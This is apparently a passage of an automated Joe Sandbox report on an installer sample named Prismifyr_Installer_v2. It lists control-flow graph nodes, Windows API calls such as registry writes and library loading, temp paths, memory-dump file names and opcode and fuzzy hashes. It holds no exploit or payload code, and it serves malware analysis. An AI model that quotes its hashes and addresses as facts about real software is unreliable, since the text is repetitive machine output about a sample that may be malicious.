                                                                                                                                                                                                                            • Part of subcall function 00405322: lstrcatW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\,0040327A,0040327A,Remove folder: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\,00000000,0042CE00,762323A0), ref: 0040537D
                                                                                                                                                                                                                            • Part of subcall function 00405322: SetWindowTextW.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\), ref: 0040538F
                                                                                                                                                                                                                            • Part of subcall function 00405322: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004053B5
                                                                                                                                                                                                                            • Part of subcall function 00405322: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053CF
                                                                                                                                                                                                                            • Part of subcall function 00405322: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053DD
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2535787698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535765193.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535814367.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000483000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000054F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000553000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2536289638.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Prismifyr_Installer_v2.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsyC753.tmp$C:\Users\user\AppData\Local\Temp\nsyC753.tmp\StdUtils.dll$ExecShellAsUser
                                                                                                                                                                                                                          • API String ID: 1941528284-3783607559
                                                                                                                                                                                                                          • Opcode ID: 84cc1ef8d08a74648e49299eefb5f22073aa957ae4a4092afed5da839c45f715
                                                                                                                                                                                                                          • Instruction ID: c6e8234c1d4b6e0ef99598e998ad36802638a9a190aaa2bd7459f070bf199d51
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 84cc1ef8d08a74648e49299eefb5f22073aa957ae4a4092afed5da839c45f715
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9841B471900514BACF107BA5CD45DAF3A79EF05368F20423FF422B10E1DA3C86919A6E

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 627 406624-406644 GetSystemDirectoryW 628 406646 627->628 629 406648-40664a 627->629 628->629 630 40665b-40665d 629->630 631 40664c-406655 629->631 633 40665e-406691 wsprintfW LoadLibraryExW 630->633 631->630 632 406657-406659 631->632 632->633
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040663B
                                                                                                                                                                                                                          • wsprintfW.USER32 ref: 00406676
                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040668A
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2535787698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535765193.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535814367.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000483000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000054F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000553000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2536289638.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Prismifyr_Installer_v2.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                                                                                                          • String ID: %s%S.dll$UXTHEME$\
                                                                                                                                                                                                                          • API String ID: 2200240437-1946221925
                                                                                                                                                                                                                          • Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                                                                                                                                                                          • Instruction ID: 9fa172bba6ca99a644905d2b6d7ed641771312ed853c50fe9922007c80c3d461
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7CF0FC70501119A6CF10BB64DD0EF9B365CA700304F10447AA54AF10D1EBB9DB64CB99

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 634 403116-40312d 635 403136-40313f 634->635 636 40312f 634->636 637 403141 635->637 638 403148-40314d 635->638 636->635 637->638 639 40315d-40316a call 403331 638->639 640 40314f-403158 call 403347 638->640 644 403170-403174 639->644 645 40331f 639->645 640->639 646 4032ca-4032cc 644->646 647 40317a-4031c3 GetTickCount 644->647 648 403321-403322 645->648 649 40330c-40330f 646->649 650 4032ce-4032d1 646->650 651 403327 647->651 652 4031c9-4031d1 647->652 653 40332a-40332e 648->653 657 403311 649->657 658 403314-40331d call 403331 649->658 650->651 654 4032d3 650->654 651->653 655 4031d3 652->655 656 4031d6-4031e4 call 403331 652->656 659 4032d6-4032dc 654->659 655->656 656->645 668 4031ea-4031f3 656->668 657->658 658->645 666 403324 658->666 663 4032e0-4032ee call 403331 659->663 664 4032de 659->664 663->645 671 4032f0-4032f5 call 405e62 663->671 664->663 666->651 670 4031f9-403219 call 4067f5 668->670 676 4032c2-4032c4 670->676 677 40321f-403232 GetTickCount 670->677 675 4032fa-4032fc 671->675 678 4032c6-4032c8 675->678 679 4032fe-403308 675->679 676->648 680 403234-40323c 677->680 681 40327d-40327f 677->681 678->648 679->659 684 40330a 679->684 685 403244-40327a MulDiv wsprintfW call 405322 680->685 686 40323e-403242 680->686 682 403281-403285 681->682 683 4032b6-4032ba 681->683 688 403287-40328e call 405e62 682->688 689 40329c-4032a7 682->689 683->652 690 4032c0 683->690 684->651 685->681 686->681 686->685 694 403293-403295 688->694 693 4032aa-4032ae 689->693 690->651 693->670 695 4032b4 693->695 694->678 696 403297-40329a 694->696 695->651 696->693
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2535787698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535765193.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535814367.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000483000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000054F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000553000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2536289638.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Prismifyr_Installer_v2.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountTick$wsprintf
                                                                                                                                                                                                                          • String ID: ... %d%%
                                                                                                                                                                                                                          • API String ID: 551687249-2449383134
                                                                                                                                                                                                                          • Opcode ID: 791be84a4dbf0ce6e2b89685bbb0426d8c944effbebd544c9fcf1485a6d681ca
                                                                                                                                                                                                                          • Instruction ID: f437ad28db75119c3a693f92e670aa5c34007c7df9fe8e0debaece40423bbb79
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 791be84a4dbf0ce6e2b89685bbb0426d8c944effbebd544c9fcf1485a6d681ca
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0D517D71900219DBDB10DF66EA44AAE7BB8AB04356F54417FEC14B72C0CB388A51CBA9

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 697 401c1f-401c3f call 402c1f * 2 702 401c41-401c48 call 402c41 697->702 703 401c4b-401c4f 697->703 702->703 704 401c51-401c58 call 402c41 703->704 705 401c5b-401c61 703->705 704->705 708 401c63-401c7f call 402c1f * 2 705->708 709 401caf-401cd9 call 402c41 * 2 FindWindowExW 705->709 721 401c81-401c9d SendMessageTimeoutW 708->721 722 401c9f-401cad SendMessageW 708->722 720 401cdf 709->720 723 401ce2-401ce5 720->723 721->723 722->720 724 402ac5-402ad4 723->724 725 401ceb 723->725 725->724
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2535787698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535765193.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535814367.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000483000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000054F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000553000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2536289638.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Prismifyr_Installer_v2.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$Timeout
                                                                                                                                                                                                                          • String ID: !
                                                                                                                                                                                                                          • API String ID: 1777923405-2657877971
                                                                                                                                                                                                                          • Opcode ID: 3fb84e4798befa08d55ab41dd677560f87883767086f956b8989b4831fa63046
                                                                                                                                                                                                                          • Instruction ID: 1af55e8da281c8781352e9764615226c40e2312ccaecb42dabcb88ef8baddf82
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3fb84e4798befa08d55ab41dd677560f87883767086f956b8989b4831fa63046
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5621C371948209AEEF049FB5DE4AABE7BB4EF84304F14443EF605B61D0D7B889809B19

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 728 402032-40203e 729 402044-40205a call 402c41 * 2 728->729 730 4020fd-4020ff 728->730 740 40206a-402079 LoadLibraryExW 729->740 741 40205c-402068 GetModuleHandleW 729->741 731 40224b-402250 call 401423 730->731 737 402ac5-402ad4 731->737 738 40288b-402892 731->738 738->737 743 40207b-40208a call 406703 740->743 744 4020f6-4020f8 740->744 741->740 741->743 748 4020c5-4020ca call 405322 743->748 749 40208c-402092 743->749 744->731 754 4020cf-4020d2 748->754 750 402094-4020a0 call 401423 749->750 751 4020ab-4020bb 749->751 750->754 762 4020a2-4020a9 750->762 756 4020c0-4020c3 751->756 754->737 757 4020d8-4020e2 call 40394a 754->757 756->754 757->737 761 4020e8-4020f1 FreeLibrary 757->761 761->737 762->754
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 0040205D
                                                                                                                                                                                                                            • Part of subcall function 00405322: lstrlenW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\,00000000,0042CE00,762323A0,?,?,?,?,?,?,?,?,?,0040327A,00000000,?), ref: 0040535A
                                                                                                                                                                                                                            • Part of subcall function 00405322: lstrlenW.KERNEL32(0040327A,Remove folder: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\,00000000,0042CE00,762323A0,?,?,?,?,?,?,?,?,?,0040327A,00000000), ref: 0040536A
                                                                                                                                                                                                                            • Part of subcall function 00405322: lstrcatW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\,0040327A,0040327A,Remove folder: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\,00000000,0042CE00,762323A0), ref: 0040537D
                                                                                                                                                                                                                            • Part of subcall function 00405322: SetWindowTextW.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\), ref: 0040538F
                                                                                                                                                                                                                            • Part of subcall function 00405322: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004053B5
                                                                                                                                                                                                                            • Part of subcall function 00405322: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053CF
                                                                                                                                                                                                                            • Part of subcall function 00405322: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053DD
                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040206E
                                                                                                                                                                                                                          • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 004020EB
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2535787698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535765193.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535814367.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000483000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000054F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000553000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2536289638.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Prismifyr_Installer_v2.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                                                                                                                                          • String ID: gs
                                                                                                                                                                                                                          • API String ID: 334405425-616317460
                                                                                                                                                                                                                          • Opcode ID: 72a5e19f9697d1318c9a310d29b5b60265bfdb2e952e74c10cb73e1909f0eb38
                                                                                                                                                                                                                          • Instruction ID: 3abd81b96889d1c7eb1cceed2e7b5e281284f1a6e6a9a5ff44b88a827c8e1d1c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 72a5e19f9697d1318c9a310d29b5b60265bfdb2e952e74c10cb73e1909f0eb38
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8821B071D00205AACF20AFA5CE48A9E7A70BF04358F60413BF511B11E0DBBD8981DA6E

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 763 4023e4-402415 call 402c41 * 2 call 402cd1 770 402ac5-402ad4 763->770 771 40241b-402425 763->771 772 402427-402434 call 402c41 lstrlenW 771->772 773 402438-40243b 771->773 772->773 775 40243d-40244e call 402c1f 773->775 776 40244f-402452 773->776 775->776 780 402463-402477 RegSetValueExW 776->780 781 402454-40245e call 403116 776->781 785 402479 780->785 786 40247c-40255d RegCloseKey 780->786 781->780 785->786 786->770
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsyC753.tmp,00000023,00000011,00000002), ref: 0040242F
                                                                                                                                                                                                                          • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsyC753.tmp,00000000,00000011,00000002), ref: 0040246F
                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsyC753.tmp,00000000,00000011,00000002), ref: 00402557
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2535787698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535765193.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535814367.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000483000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000054F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000553000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2536289638.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Prismifyr_Installer_v2.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseValuelstrlen
                                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsyC753.tmp
                                                                                                                                                                                                                          • API String ID: 2655323295-2040663200
                                                                                                                                                                                                                          • Opcode ID: 1af8095f3c9504d2ce798825688ccba5ec512a5a8ae6ba4a7bc3247cfd6f00f3
                                                                                                                                                                                                                          • Instruction ID: a703f9f7a84a81219e2528cb215680d2185ac4e531b753f9c0eacf199e84c27d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1af8095f3c9504d2ce798825688ccba5ec512a5a8ae6ba4a7bc3247cfd6f00f3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AF118471D00104BEEB10AFA5DE89EAEBA74AB44754F11803BF504F71D1D7F48D409B29

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
